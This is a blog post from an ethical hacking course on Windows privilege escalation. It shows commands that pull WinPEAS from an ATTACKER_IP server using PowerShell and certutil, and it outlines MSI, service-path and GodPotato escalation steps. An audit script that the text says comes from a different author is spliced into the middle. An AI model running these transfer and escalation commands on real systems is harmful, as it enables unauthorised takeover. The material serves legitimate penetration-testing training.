Mr Elite

Posted on • Originally published at securityelites.com

Windows Privilege Escalation 2026 — WinPEAS, AlwaysInstallElevated, Token Impersonation | Hacking Course Day 32

📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.

🛡️ Part of the Free Ethical Hacking Course — 100 Days · Day 32 of 100 · 32% complete

⚠️ Authorised Systems Only. Every technique in this article is for use exclusively on systems you own, CTF lab environments, or targets covered by explicit written authorisation in a formal penetration test scope. Applying these techniques without authorisation constitutes a criminal offence under computer misuse legislation in most jurisdictions. All exercises target TryHackMe authorised rooms or your own lab VM only.

Windows privilege escalation 2026 — I have escalated from a low-privilege IIS service account to NT AUTHORITY\SYSTEM in under four minutes on production enterprise networks. Not with zero-days. With AlwaysInstallElevated registry keys that an IT team enabled in 2019 to solve a deployment headache and never disabled. With SeImpersonatePrivilege that Windows grants IIS application pools by design. With unquoted service paths left by a vendor who installed their software a decade ago. WinPEAS finds every one of these in thirty seconds. The gap between “we run Windows” and “we run Windows securely” is almost always these exact misconfigurations — persistent, widespread, and invisible until someone looks.

🎯 What You’ll Master in Day 32

Run WinPEAS and interpret its colour-coded output to identify exploitable escalation vectors
Exploit AlwaysInstallElevated using a malicious MSI generated with msfvenom
Identify and exploit unquoted service paths with write access to intermediate directories
Modify weak service permissions using accesschk and sc config
Abuse SeImpersonatePrivilege with GodPotato for instant SYSTEM on IIS and service account footholds
Verify SYSTEM, demonstrate impact, and document the escalation chain for a professional pentest report

⏱️ 45 min read · 3 exercises · Authorised lab targets only

📋 Prerequisites — Complete Before Day 32

Day 31: Linux Privilege Escalation — SUID, sudo, cron exploitation on Linux provides the conceptual framework for Windows escalation patterns
Day 21: Metasploit Framework — msfvenom MSI payload generation is used in the AlwaysInstallElevated exploit chain
Day 28: Lateral Movement Techniques — SYSTEM access feeds directly into lateral movement and domain escalation

📋 Windows Privilege Escalation 2026 — Table of Contents

1. WinPEAS — Automated Enumeration in 30 Seconds
2. AlwaysInstallElevated — Registry Key to SYSTEM
3. Unquoted Service Path Exploitation
4. Weak Service Permissions with accesschk
5. SeImpersonatePrivilege — Token Impersonation with GodPotato
6. Additional Vectors — Scheduled Tasks, Stored Credentials, DLL Hijacking
7. Post-Escalation — Verification, Impact Demonstration, Cleanup

Day 31 covered Linux privilege escalation — SUID exploitation, sudo misconfigurations, writable cron jobs. Day 32 is the Windows equivalent. The philosophy is identical: default configurations, legacy software, and administrator convenience settings create persistent escalation paths that survive undetected for years. This is core curriculum in the 100-Day Ethical Hacking Course. Every professional penetration tester must be fluent in both Linux and Windows privilege escalation — most real-world environments are mixed, and your escalation methodology must be too.

WinPEAS — Automated Windows Privilege Escalation Enumeration

WinPEAS (Windows Privilege Escalation Awesome Script) is the first tool you run the moment you establish code execution on a Windows target. Before manually checking anything, before chasing hunches, run WinPEAS. It checks over 300 enumeration points simultaneously and produces colour-coded output that shows you exactly which misconfigurations are present. Red and yellow highlights are your action items. Everything else is context. A full WinPEAS run takes under sixty seconds on most systems and tells you more than an hour of manual enumeration would.

What WinPEAS actually checks spans the entire Windows security model: registry policies that grant elevated installer rights, service executable paths and their access control lists, file system permissions on directories in the system path, stored credentials in the Windows Credential Manager and browser profiles, scheduled tasks that run as SYSTEM with writable script files, installed software versions cross-referenced against a local CVE database, token privileges enabled on the current account, and network configuration revealing additional lateral movement paths. Each check maps to a known escalation technique. When WinPEAS highlights something in red, that technique is viable with high confidence. Yellow means the finding warrants manual verification before exploitation.

WINPEAS — DOWNLOAD, TRANSFER, AND RUN

```bash
# On Kali — download latest WinPEAS
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany.exe -O winpeas.exe

# Host it via Python HTTP server
python3 -m http.server 8080
```

```powershell
# On the Windows target — download WinPEAS (PowerShell)
Invoke-WebRequest -Uri "http://ATTACKER_IP:8080/winpeas.exe" -OutFile "C:\Users\Public\winpeas.exe"

# Alternative — certutil if PowerShell execution policy is restricted
certutil -urlcache -split -f http://ATTACKER_IP:8080/winpeas.exe C:\Users\Public\winpeas.exe

# Run WinPEAS — full scan with colour output
C:\Users\Public\winpeas.exe

# Save to file for offline review
C:\Users\Public\winpeas.exe > C:\Users\Public\out.txt 2>&1

# Targeted checks only — faster for specific vectors
C:\Users\Public\winpeas.exe reg          # registry misconfigs
C:\Users\Public\winpeas.exe services     # service paths and ACLs
C:\Users\Public\winpeas.exe systeminfo   # OS version and patches
```

Key red/yellow outputs to act on immediately:

AlwaysInstallElevated: 1 → HKLM + HKCU = MSI escalation path
Unquoted path: … → service path with spaces, no quotes
SeImpersonatePrivilege → GodPotato or PrintSpoofer applicable
Modifiable service binary → sc config binary path replacement
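A defensive counterpart to the WinPEAS findings above, added here as an example and not taken from the article or the PEASS-ng project: a PowerShell audit that reports AlwaysInstallElevated, unquoted service paths and writable service binaries on the local host so an administrator can remediate them before anyone else finds them. The function names, the path-parsing heuristics and the remediation text are my own assumptions.

```powershell
# Added audit script (not from the original article): checks the local host for the
# WinPEAS findings listed above so they can be fixed before anyone exploits them.
# Run from an elevated PowerShell prompt on a host you administer.

function Get-AlwaysInstallElevatedFinding {
    # The MSI path exists only when BOTH the machine and the user policy value are 1.
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $enabled = foreach ($p in $paths) {
        (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated -eq 1
    }
    if ($enabled -notcontains $false) {
        [pscustomobject]@{ Check = 'AlwaysInstallElevated'; Detail = 'HKLM and HKCU both set to 1'
            Fix = 'Disable "Always install with elevated privileges" in both Computer and User Configuration' }
    }
}

function Get-UnquotedServicePathFinding {
    # Unquoted path with a space before the executable name, outside C:\Windows.
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^C:\\Windows\\' -and
        ($_.PathName -split '\.exe')[0] -match ' '
    } | ForEach-Object {
        [pscustomobject]@{ Check = 'UnquotedServicePath'; Detail = "$($_.Name): $($_.PathName)"
            Fix = 'Quote the ImagePath and deny non-admin write access on every intermediate directory' }
    }
}

function Get-WritableServiceBinaryFinding {
    # Flags service executables that low-privilege principals can modify or replace.
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_   # strip quotes/arguments to recover the executable path (heuristic)
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' -| /')[0] }
        if ($exe -and (Test-Path -LiteralPath $exe)) {
            $bad = (Get-Acl -LiteralPath $exe).Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and $_.IdentityReference -match 'Users|Everyone' -and
                $_.FileSystemRights -match 'Write|Modify|FullControl'
            }
            if ($bad) { [pscustomobject]@{ Check = 'ModifiableServiceBinary'
                Detail = "$($svc.Name): $exe writable by $($bad.IdentityReference -join ', ')"
                Fix = 'Remove write rights for non-admin principals on the binary and its directory' } }
        }
    }
}

$findings = @(Get-AlwaysInstallElevatedFinding; Get-UnquotedServicePathFinding; Get-WritableServiceBinaryFinding)
if ($findings) { $findings | Format-List } else { 'No findings for the checked vectors.' }
# SeImpersonatePrivilege is a token right, not a misconfiguration: whoami /priv shows it directly.
whoami /priv | Select-String 'SeImpersonatePrivilege'
```

Each finding carries the same label WinPEAS would highlight, so the output can be compared directly against a WinPEAS run on the same host.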


📖 Read the complete guide on SecurityElites

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →


This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.